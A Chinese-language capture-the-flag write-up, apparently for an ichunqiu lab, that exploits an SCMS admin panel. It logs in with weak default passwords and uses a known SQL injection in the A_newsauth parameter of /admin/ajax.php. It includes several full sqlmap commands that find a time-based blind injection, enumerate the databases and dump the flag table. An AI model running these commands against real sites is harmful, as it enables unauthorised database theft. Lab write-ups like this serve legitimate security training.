打开靶场看到如下页面,尝试了所有输入框发现都没有SQL注入,于是就在漏洞库看了一眼,发现 /admin/ajax.php 中的 A_newsauth 参数发现包含 SQL 注入漏洞
于是url后加/admin尝试弱口令admin、admin123进入后台,然后构造urlhttp://eci-2ze1d1nv4k3rqccbv5b2.cloudeci1.ichunqiu.com/admin/ajax.php?A_newsauth=all
抓包发现cookie带了很多参数,在后台管理页面找了一下,发现管理员列表中添加管理员存在cookie中的参数
继续抓包
sqlmap跑一下sqlmap -r test.txt -p A_newsauth%5B%5D -randomize=A_login --batch --dbs 发现存在时间盲注并跑出来四个数据库
四个库看mysql和scms库看哪个是我们要找的库
sqlmap -r test.txt -p A_newsauth%5B%5D -randomize=A_login -D mysql --tables结果不是
那就试试scms
sqlmap -r test.txt -p A_newsauth%5B%5D -randomize=A_login -D scms --dump
sqlmap -r test.txt -p A_newsauth%5B%5D -randomize=A_login -D scms -T fllllaaaag --dump
不得不说,受网络问题影响,注入过程是真的费时间还会出现问题,不过如果跑出来库也可以直接尝试下面命令直接跑出来
sqlmap -r test.txt -p A_newsauth%5B%5D -randomize=A_login --dbms mysql --sql-query "SELECT substring(flag,17,1) from scms.fllllaaaag"
最终flag:flag{5745aa4e-b99a-4b3b-bd42-d920d1448841}不过每次开启的环境flag都不一样还是需要大家自己跑一下。